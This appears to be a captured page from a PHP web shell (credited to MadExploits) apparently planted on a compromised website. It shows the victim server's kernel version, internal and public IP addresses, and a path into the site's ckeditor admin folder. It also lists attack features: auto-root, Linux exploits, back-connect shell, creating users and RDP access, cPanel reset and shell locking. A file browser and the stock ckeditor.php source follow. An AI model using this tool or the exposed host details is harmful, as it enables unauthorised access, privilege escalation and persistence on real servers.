Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.144.132.48
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
wwwroot /
jdcpatala.org /
np_admin /
ckeditor /
[ HOME SHELL ]
Name
Size
Permission
Action
_samples
[ DIR ]
drwxr-xr-x
_source
[ DIR ]
drwxr-xr-x
adapters
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
skins
[ DIR ]
drwxr-xr-x
themes
[ DIR ]
drwxr-xr-x
.htaccess
768
B
-rw-r--r--
CHANGES.html
113.41
KB
-rw-r--r--
INSTALL.html
2.7
KB
-rw-r--r--
LICENSE.html
68.17
KB
-rw-r--r--
ckeditor.asp
29.17
KB
-rw-r--r--
ckeditor.js
335.28
KB
-rw-r--r--
ckeditor.pack
7.17
KB
-rw-r--r--
ckeditor.php
933
B
-rw-r--r--
ckeditor_basic.js
6.63
KB
-rw-r--r--
ckeditor_basic_source.js
1.48
KB
-rw-r--r--
ckeditor_php4.php
15.12
KB
-rw-r--r--
ckeditor_php5.php
15.1
KB
-rw-r--r--
ckeditor_source.js
1.55
KB
-rw-r--r--
config.js
320
B
-rw-r--r--
contents.css
895
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ckeditor.php
<?php /* * Copyright (c) 2003-2010, CKSource - Frederico Knabben. All rights reserved. * For licensing, see LICENSE.html or http://ckeditor.com/license */ /*! \mainpage CKEditor - PHP server side intergation * \section intro_sec CKEditor * Visit <a href="http://ckeditor.com">CKEditor web site</a> to find more information about the editor. * \section install_sec Installation * \subsection step1 Include ckeditor.php in your PHP web site. * @code * <?php * include("ckeditor/ckeditor.php"); * ?> * @endcode * \subsection step2 Create CKEditor class instance and use one of available methods to insert CKEditor. * @code * <?php * $CKEditor = new CKEditor(); * echo $CKEditor->textarea("field1", "<p>Initial value.</p>"); * ?> * @endcode */ if ( !function_exists('version_compare') || version_compare( phpversion(), '5', '<' ) ) include_once( 'ckeditor_php4.php' ) ; else include_once( 'ckeditor_php5.php' ) ;
Close